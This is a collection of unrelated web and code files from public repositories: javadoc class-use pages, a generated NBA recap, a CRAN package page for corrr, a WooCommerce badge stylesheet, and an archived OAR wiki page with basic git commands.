<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Thu Oct 23 20:37:09 CEST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Class org.richfaces.component.AbstractNotify (RichFaces Distribution Assembler 4.5.0.Final API)</title> <meta name="date" content="2014-10-23"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.richfaces.component.AbstractNotify (RichFaces Distribution Assembler 4.5.0.Final API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../org/richfaces/component/AbstractNotify.html" title="class in org.richfaces.component">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../../../../overview-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><b>RichFaces Distribution Assembler 4.5.0.Final</b></em></div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/richfaces/component/class-use/AbstractNotify.html" target="_top">Frames</a></li> <li><a href="AbstractNotify.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.richfaces.component.AbstractNotify" class="title">Uses of Class<br>org.richfaces.component.AbstractNotify</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../org/richfaces/component/AbstractNotify.html" title="class in org.richfaces.component">AbstractNotify</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.richfaces.component">org.richfaces.component</a></td> <td class="colLast"> <div class="block">Base RichFaces components interfaces and classes</div> </td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="org.richfaces.component"> <!-- --> </a> <h3>Uses of <a href="../../../../org/richfaces/component/AbstractNotify.html" title="class in org.richfaces.component">AbstractNotify</a> in <a href="../../../../org/richfaces/component/package-summary.html">org.richfaces.component</a></h3> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subclasses, and an explanation"> <caption><span>Subclasses of <a href="../../../../org/richfaces/component/AbstractNotify.html" title="class in org.richfaces.component">AbstractNotify</a> in <a href="../../../../org/richfaces/component/package-summary.html">org.richfaces.component</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UINotify.html" title="class in org.richfaces.component">UINotify</a></strong></code> <div class="block"> The &lt;rich:notify&gt; component serves for advanced user interaction, using notification boxes to give the user instant feedback on what's happening within the application.</div> </td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../org/richfaces/component/AbstractNotify.html" title="class in org.richfaces.component">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../../../../overview-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><b>RichFaces Distribution Assembler 4.5.0.Final</b></em></div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/richfaces/component/class-use/AbstractNotify.html" target="_top">Frames</a></li> <li><a href="AbstractNotify.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2014 <a href="http://www.jboss.org">JBoss by Red Hat</a>. All Rights Reserved.</small></p> </body> </html>
web/2014_season/2014112926.html
jacobbustamante/NBANLPRecap
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Hayward puts in 28, Clippers defeat the Jazz 112 to 96</title> <link rel="stylesheet" type="text/css" href="../css/style.css"> </head> <body> <h1>Hayward puts in 28, Clippers defeat the Jazz 112 to 96</h1> </br> <h2 style="color:gray">by NBANLP Recap Generator</h2> </br></br> <img src="../img/26/01.jpg" alt="No image loaded" align="right" style="height:50%; width:50%;margin-left:20px;margin-bottom:20px;"> <p>Gordon Hayward contributed well to the Jazz total, recording 28 points. The Clippers biggest lead of the night was by 21 with 5 minutes remaining in the 3rd. Blake Griffin contributed well to the Clippers total, recording 24 points.</p> <p>Gordon put up 28 points for the Jazz in a good scoring contribution. Hayward contributed 3 assists and 5 rebounds. 18 of his points occurred in the 2nd quarter.</p> <p>The Clippers were up by as much as 21 points in the 3rd with a 82-61 lead.</p> <p>Blake led the Clippers in scoring with 24 points. Griffin contributed 3 assists and 6 rebounds.</p> <p>The Jazz went on a 12 and 0 run in the 1st quarter with the Clippers giving up 2 turnovers and 2 missed attempts during that time.</p> <p>The Jazz are 5-12 for the season. The Clippers are 11-5. The Clippers have been playing great these last few games, winning their last 4. It's been a rough last few games for the Jazz. They've lost their last 5 games.</p> <p>Derrick Favors put in 15 points. Favors contributed 1 assists and 7 rebounds for the Jazz. The Jazz Trevor Booker and Alec Burks put in 11 and 12 points respectively. Booker contributed 2 assists and 9 rebounds for the Jazz. Burks got 4 assists and 2 rebounds. The Clippers Jamal Crawford and Chris Paul put in 20 and 15 points respectively. Crawford recorded 2 rebounds for the Clippers. Paul got 10 assists and 3 rebounds.</p> </body> </html>
lib/apache-jena-2.12.1/javadoc-sdb/com/hp/hpl/jena/sdb/layout2/index/class-use/FmtLayout2IndexSAP.html
knil-sama/YADDW
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_45) on Thu Oct 02 16:45:06 BST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Class com.hp.hpl.jena.sdb.layout2.index.FmtLayout2IndexSAP (Apache Jena SDB)</title> <meta name="date" content="2014-10-02"> <link rel="stylesheet" type="text/css" href="../../../../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class com.hp.hpl.jena.sdb.layout2.index.FmtLayout2IndexSAP (Apache Jena SDB)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../../com/hp/hpl/jena/sdb/layout2/index/FmtLayout2IndexSAP.html" title="class in com.hp.hpl.jena.sdb.layout2.index">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../../index.html?com/hp/hpl/jena/sdb/layout2/index/class-use/FmtLayout2IndexSAP.html" target="_top">Frames</a></li> <li><a href="FmtLayout2IndexSAP.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class com.hp.hpl.jena.sdb.layout2.index.FmtLayout2IndexSAP" class="title">Uses of Class<br>com.hp.hpl.jena.sdb.layout2.index.FmtLayout2IndexSAP</h2> </div> <div class="classUseContainer">No usage of com.hp.hpl.jena.sdb.layout2.index.FmtLayout2IndexSAP</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../../com/hp/hpl/jena/sdb/layout2/index/FmtLayout2IndexSAP.html" title="class in com.hp.hpl.jena.sdb.layout2.index">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../../index.html?com/hp/hpl/jena/sdb/layout2/index/class-use/FmtLayout2IndexSAP.html" target="_top">Frames</a></li> <li><a href="FmtLayout2IndexSAP.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Licenced under the Apache License, Version 2.0</small></p> </body> </html>
libs/jfreechart-1.0.16/javadoc/org/jfree/chart/axis/class-use/CyclicNumberAxis.CycleBoundTick.html
Mr-Steve/LTSpice_Library_Manager
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0-ea) on Thu Sep 26 11:52:57 CDT 2013 --> <title>Uses of Class org.jfree.chart.axis.CyclicNumberAxis.CycleBoundTick (JFreeChart Class Library (version 1.0.16))</title> <meta name="date" content="2013-09-26"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.jfree.chart.axis.CyclicNumberAxis.CycleBoundTick (JFreeChart Class Library (version 1.0.16))"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../org/jfree/chart/axis/CyclicNumberAxis.CycleBoundTick.html" title="class in org.jfree.chart.axis">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/jfree/chart/axis/class-use/CyclicNumberAxis.CycleBoundTick.html" target="_top">Frames</a></li> <li><a href="CyclicNumberAxis.CycleBoundTick.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.jfree.chart.axis.CyclicNumberAxis.CycleBoundTick" class="title">Uses of Class<br>org.jfree.chart.axis.CyclicNumberAxis.CycleBoundTick</h2> </div> <div class="classUseContainer">No usage of org.jfree.chart.axis.CyclicNumberAxis.CycleBoundTick</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../org/jfree/chart/axis/CyclicNumberAxis.CycleBoundTick.html" title="class in org.jfree.chart.axis">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/jfree/chart/axis/class-use/CyclicNumberAxis.CycleBoundTick.html" target="_top">Frames</a></li> <li><a href="CyclicNumberAxis.CycleBoundTick.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
Code/GetMetaDataFromCRAN/raw_html/corrr.html
esander91/NamespacePollution
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CRAN - Package corrr</title> <link rel="stylesheet" type="text/css" href="../../CRAN_web.css" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="citation_title" content="Correlations in R [R package corrr version 0.2.1]" /> <meta name="citation_author" content="Simon Jackson" /> <meta name="citation_publication_date.Published" content="2016-10-10" /> <meta name="citation_public_url" content="https://CRAN.R-project.org/package=corrr" /> <meta name="DC.identifier" content="https://CRAN.R-project.org/package=corrr" /> <meta name="DC.publisher" content="Comprehensive R Archive Network (CRAN)" /> <style type="text/css"> table td { vertical-align: top; } </style> </head> <body> <h2>corrr: Correlations in R</h2> <p>A tool for exploring correlations. It makes it possible to easily perform routine tasks when exploring correlation matrices such as ignoring the diagonal, focusing on the correlations of certain variables against others, or rearranging and visualising the matrix in terms of the strength of the correlations.</p> <table summary="Package corrr summary"> <tr> <td>Version:</td> <td>0.2.1</td> </tr> <tr> <td>Depends:</td> <td>R (&ge; 3.3.1), <a href="../dplyr/index.html">dplyr</a> (&ge; 0.5.0)</td> </tr> <tr> <td>Imports:</td> <td><a href="../magrittr/index.html">magrittr</a> (&ge; 1.5), <a href="../tidyr/index.html">tidyr</a> (&ge; 0.5.1), <a href="../ggplot2/index.html">ggplot2</a> (&ge; 2.1.0), <a href="../seriation/index.html">seriation</a> (&ge; 1.2-0), <a href="../lazyeval/index.html">lazyeval</a> (&ge; 0.2.0), <a href="../purrr/index.html">purrr</a> (&ge; 0.2.2), <a href="../tibble/index.html">tibble</a> (&ge; 1.1), <a href="../ggrepel/index.html">ggrepel</a> (&ge; 0.5)</td> </tr> <tr> <td>Suggests:</td> <td><a href="../testthat/index.html">testthat</a> (&ge; 1.0.2), <a href="../knitr/index.html">knitr</a> (&ge; 1.13), <a href="../rmarkdown/index.html">rmarkdown</a> (&ge; 0.9.6)</td> </tr> <tr> <td>Published:</td> <td>2016-10-10</td> </tr> <tr> <td>Author:</td> <td>Simon Jackson [aut, cre]</td> </tr> <tr> <td>Maintainer:</td> <td>Simon Jackson &#x3c;&#x64;&#x72;&#x73;&#x69;&#x6d;&#x6f;&#x6e;&#x6a;&#x61;&#x63;&#x6b;&#x73;&#x6f;&#x6e;&#x20;&#x61;&#x74;&#x20;&#x67;&#x6d;&#x61;&#x69;&#x6c;&#x2e;&#x63;&#x6f;&#x6d;&#x3e;</td> </tr> <tr> <td>BugReports:</td> <td><a href="https://github.com/drsimonj/corrr/issues">https://github.com/drsimonj/corrr/issues</a></td> </tr> <tr> <td>License:</td> <td><a href="../../licenses/MIT">MIT</a> + file <a href="LICENSE">LICENSE</a></td> </tr> <tr> <td>URL:</td> <td><a href="https://github.com/drsimonj/corrr">https://github.com/drsimonj/corrr</a></td> </tr> <tr> <td>NeedsCompilation:</td> <td>no</td> </tr> <tr> <td>Materials:</td> <td><a href="README.html">README</a> </td> </tr> <tr> <td>CRAN&nbsp;checks:</td> <td><a href="../../checks/check_results_corrr.html">corrr results</a></td> </tr> </table> <h4>Downloads:</h4> <table summary="Package corrr downloads"> <tr> <td> Reference&nbsp;manual: </td> <td> <a href="corrr.pdf"> corrr.pdf </a> </td> </tr> <tr> <td>Vignettes:</td> <td> <a href="vignettes/using-corrr.html">Using corrr</a><br/> </td> </tr> <tr> <td> Package&nbsp;source: </td> <td> <a href="../../../src/contrib/corrr_0.2.1.tar.gz"> corrr_0.2.1.tar.gz </a> </td> </tr> <tr> <td> Windows&nbsp;binaries: </td> <td> r-devel: <a href="../../../bin/windows/contrib/3.5/corrr_0.2.1.zip">corrr_0.2.1.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/corrr_0.2.1.zip">corrr_0.2.1.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/corrr_0.2.1.zip">corrr_0.2.1.zip</a> </td> </tr> <tr> <td> OS&nbsp;X&nbsp;El&nbsp;Capitan&nbsp;binaries: </td> <td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/corrr_0.2.1.tgz">corrr_0.2.1.tgz</a> </td> </tr> <tr> <td> OS&nbsp;X&nbsp;Mavericks&nbsp;binaries: </td> <td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/corrr_0.2.1.tgz">corrr_0.2.1.tgz</a> </td> </tr> <tr> <td> Old&nbsp;sources: </td> <td> <a href="../../../src/contrib/Archive/corrr"> corrr archive </a> </td> </tr> </table> <h4>Linking:</h4> <p>Please use the canonical form <a href="https://CRAN.R-project.org/package=corrr"><samp>https://CRAN.R-project.org/package=corrr</samp></a> to link to this page.</p> </body> </html>
wp-content/plugins/yith-woocommerce-badges-management/assets/css/frontend.css
povilas111/majescticMovement
/** * Frontend style * * @author Leanza Francesco * @version 1.0.0 */ .yith-wcbm-badge { position : absolute; box-sizing : border-box; text-align : center; z-index : 10; } .yith-wcbm-badge img { max-width : 200px; max-height : 200px; } p.yith-wcbm-badge-txt { margin : 0; padding : 0; } .container-image-and-badge { position : relative; display : block; text-indent : 0; } .yith-wcbm-badge img { margin : 0 !important; } span.onsale { z-index : 10; } /* ============================================================================================ * T h e m e s a n d p l u g i n s C o m p a t i b i l i t y * ============================================================================================ */ /* - - - hide badges on product thumbnails - - - - */ .product-thumbnails .yith-wcbm-badge { display : none !important; } /* - - - - - - F L A T S O M E - - - - - - */ .iosSlider.product-thumbnails .yith-wcbm-badge { display : none !important; } #mini-cart-content .container-image-and-badge .yith-wcbm-badge { display : none !important; } #mini-cart-content .container-image-and-badge { position : static !important; } /* ----- WISHLIST ----- */ #yith-wcwl-form .yith-wcbm-badge { display : none !important; } /* ---- FREQUENTLY BOUGHT TOGETHER --- */ .yith-wfbt-section .yith-wcbm-badge, .yith-wfbt-form .yith-wcbm-badge{ display:none !important; } /*---- SAVE FOR LATER ---- */ #ywsfl_container_list .yith-wcbm-badge { display : none !important; } /* ---------- AJAX SEARCH ---------- */ .yith-ajaxsearchform-container .yith-wcbm-badge { display: none !important; } /* ---------- Product Bundles -------------- */ .yith-wcpb-product-bundled-items .yith-wcbm-badge { display: none !important; }
wiki-oar/index.php?title=GForge_and_git_usage&printable=yes&printable=yes.html
oar-team/website-archive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta name="generator" content="MediaWiki 1.15.5-2squeeze6" /> <meta name="robots" content="noindex,follow" /> <meta name="keywords" content="GForge and git usage" /> <link rel="shortcut icon" href="http://oar.imag.fr/images/logo_oar.ico" /> <link rel="search" type="application/opensearchdescription+xml" href="opensearch_desc.php" title="WikiOAR (en)" /> <link rel="alternate" type="application/rss+xml" title="WikiOAR RSS feed" href="index.php%3Ftitle=Special:RecentChanges&amp;feed=rss" /> <link rel="alternate" type="application/atom+xml" title="WikiOAR Atom feed" href="index.php%3Ftitle=Special:RecentChanges&amp;feed=atom" /> <title>[OAR Archive] GForge and git usage - WikiOAR</title> <link rel="stylesheet" href="skins/common/commonPrint.css%3F207.css" type="text/css" /> <link rel="stylesheet" href="index.php%3Ftitle=MediaWiki:Common.css&amp;usemsgcache=yes&amp;ctype=text%252Fcss&amp;smaxage=18000&amp;action=raw&amp;maxage=18000.css" type="text/css" /> <link rel="stylesheet" href="index.php%3Ftitle=MediaWiki:Print.css&amp;usemsgcache=yes&amp;ctype=text%252Fcss&amp;smaxage=18000&amp;action=raw&amp;maxage=18000.css" type="text/css" /> <link rel="stylesheet" href="index.php%3Ftitle=MediaWiki:Monobook.css&amp;usemsgcache=yes&amp;ctype=text%252Fcss&amp;smaxage=18000&amp;action=raw&amp;maxage=18000.css" type="text/css" /> <link rel="stylesheet" href="index.php%3Ftitle=-&amp;action=raw&amp;maxage=18000&amp;gen=css.css" type="text/css" /> <!--[if lt IE 7]><script type="text/javascript" src="/skins/common/IEFixes.js?207"></script> <meta http-equiv="imagetoolbar" content="no" /><![endif]--> <script type= "text/javascript">/*<![CDATA[*/ var skin = "monobook"; var stylepath = "/skins"; var wgArticlePath = "/index.php/$1"; var wgScriptPath = ""; var wgScript = "/index.php"; var wgVariantArticlePath = false; var wgActionPaths = {}; var wgServer = "http://oar.imag.fr/archive/wiki-oar"; var wgCanonicalNamespace = ""; var wgCanonicalSpecialPageName = false; var wgNamespaceNumber = 0; var wgPageName = "GForge_and_git_usage"; var wgTitle = "GForge and git usage"; var wgAction = "view"; var wgArticleId = "242"; var wgIsArticle = true; var wgUserName = null; var wgUserGroups = null; var wgUserLanguage = "en"; var wgContentLanguage = "en"; var wgBreakFrames = false; var wgCurRevisionId = 3438; var wgVersion = "1.15.5-2squeeze6"; var wgEnableAPI = true; var wgEnableWriteAPI = true; var wgSeparatorTransformTable = ["", ""]; var wgDigitTransformTable = ["", ""]; var wgRestrictionEdit = []; var wgRestrictionMove = []; /*]]>*/</script> <script type="text/javascript" src="skins/common/wikibits.js%3F207"><!-- wikibits js --></script> <!-- Head Scripts --> <script type="text/javascript" src="skins/common/ajax.js%3F207"></script> <script type="text/javascript" src="index.php%3Ftitle=-&amp;action=raw&amp;gen=js&amp;useskin=monobook"><!-- site js --></script> </head> <body class="mediawiki ltr ns-0 ns-subject page-GForge_and_git_usage skin-monobook"> <div id="globalWrapper"> <div id="column-content"> <div id="content"> <a name="top" id="top"></a> <h1 id="firstHeading" class="firstHeading">GForge and git usage</h1> <div id="bodyContent"> <h3 id="siteSub">From WikiOAR</h3> <div id="contentSub"></div> <div id="jump-to-nav">Jump to: <a href="index.php%3Ftitle=GForge_and_git_usage&amp;printable=yes&amp;printable=yes.html#column-one">navigation</a>, <a href="index.php%3Ftitle=GForge_and_git_usage&amp;printable=yes&amp;printable=yes.html#searchInput">search</a></div> <!-- start content --> <p><br /> </p> <a name="How_to_setup_email_notification_for_git_commits_.3F" id="How_to_setup_email_notification_for_git_commits_.3F"></a><h3> <span class="mw-headline"> How to setup email notification for git commits&nbsp;? </span></h3> <p><a href="http://siteadmin.gforge.inria.fr/FAQ.html#git_post_receive" class="external text" title="http://siteadmin.gforge.inria.fr/FAQ.html#git_post_receive" rel="nofollow">See the InriaGforge FAQ</a> </p> <a name="How_to_clone_a_git_repository_from_the_InriaGforge_.3F" id="How_to_clone_a_git_repository_from_the_InriaGforge_.3F"></a><h3> <span class="mw-headline"> How to clone a git repository from the InriaGforge&nbsp;? </span></h3> <pre>git clone git+ssh://&lt;login&gt;@scm.gforge.inria.fr//gitroot//&lt;projet&gt;/&lt;projet&gt;.git </pre> <a name="How_to_configure_name_and_email_on_a_local_repository_.3F" id="How_to_configure_name_and_email_on_a_local_repository_.3F"></a><h3> <span class="mw-headline"> How to configure name and email on a local repository&nbsp;? </span></h3> <pre>git config user.name &lt;user&gt; git config user.email &lt;email&gt; </pre> <!-- NewPP limit report Preprocessor node count: 8/1000000 Post-expand include size: 25/2097152 bytes Template argument size: 5/2097152 bytes Expensive parser function count: 0/100 #ifexist count: 0/100 --> <!-- Saved in parser cache with key wikioar:pcache:idhash:242-0!1!0!!en!2!edit=0!printable=1 and timestamp 20150721145252 --> <div class="printfooter"> Retrieved from "<a href="index.php/GForge_and_git_usage.html">http://oar.imag.fr/archive/wiki-oar/index.php/GForge_and_git_usage</a>"</div> <div id='catlinks' class='catlinks'><div id="mw-normal-catlinks"><a href="index.php/Special:Categories.html" title="Special:Categories">Category</a>:&#32;<span dir='ltr'><a href="index.php/Category:Portal:Devel.html" title="Category:Portal:Devel">Portal:Devel</a></span></div></div> <!-- end content --> <div class="visualClear"></div> </div> </div> </div> <div id="column-one"> <div id="p-cactions" class="portlet"> <h5>Views</h5> <div class="pBody"> <ul> <li id="ca-nstab-main" class="selected"><a href="index.php/GForge_and_git_usage.html" title="View the content page [c]" accesskey="c">Page</a></li> <li id="ca-talk" class="new"><a href="http://oar.imag.fr/archive/wiki-oar/index.php?title=Talk:GForge_and_git_usage&amp;action=edit&amp;redlink=1" title="Discussion about the content page [t]" accesskey="t">Discussion</a></li> <li id="ca-viewsource"><a href="index.php%3Ftitle=GForge_and_git_usage&amp;action=edit.html" title="This page is protected.&#10;You can view its source [e]" accesskey="e">View source</a></li> <li id="ca-history"><a href="index.php%3Ftitle=GForge_and_git_usage&amp;action=history.html" title="Past revisions of this page [h]" accesskey="h">History</a></li> </ul> </div> </div> <div class="portlet" id="p-personal"> <h5>Personal tools</h5> <div class="pBody"> <ul> <li id="pt-login"><a href="index.php%3Ftitle=Special:UserLogin&amp;returnto=GForge_and_git_usage.html" title="You are encouraged to log in; however, it is not mandatory [o]" accesskey="o">Log in</a></li> </ul> </div> </div> <div class="portlet" id="p-logo"> <a style="background-image: url(http://oar.imag.fr/schemas/oar_logo_small.png);" href="index.html" title="Visit the main page [z]" accesskey="z"></a> </div> <script type="text/javascript"> if (window.isMSIE55) fixalpha(); </script> <div class='generated-sidebar portlet' id='p-Public_portal'> <h5>Public portal</h5> <div class='pBody'> <ul> <li id="n-mainpage"><a href="index.html" title="Visit the main page">Main Page</a></li> <li id="n-Appliances-.28Kameleon.29"><a href="index.php/Kameleon.html">Appliances (Kameleon)</a></li> <li id="n-OAR-Website"><a href="http://oar.imag.fr">OAR Website</a></li> <li id="n-REST-API"><a href="index.php/RESTfullAPI.html">REST API</a></li> <li id="n-Customization-tips"><a 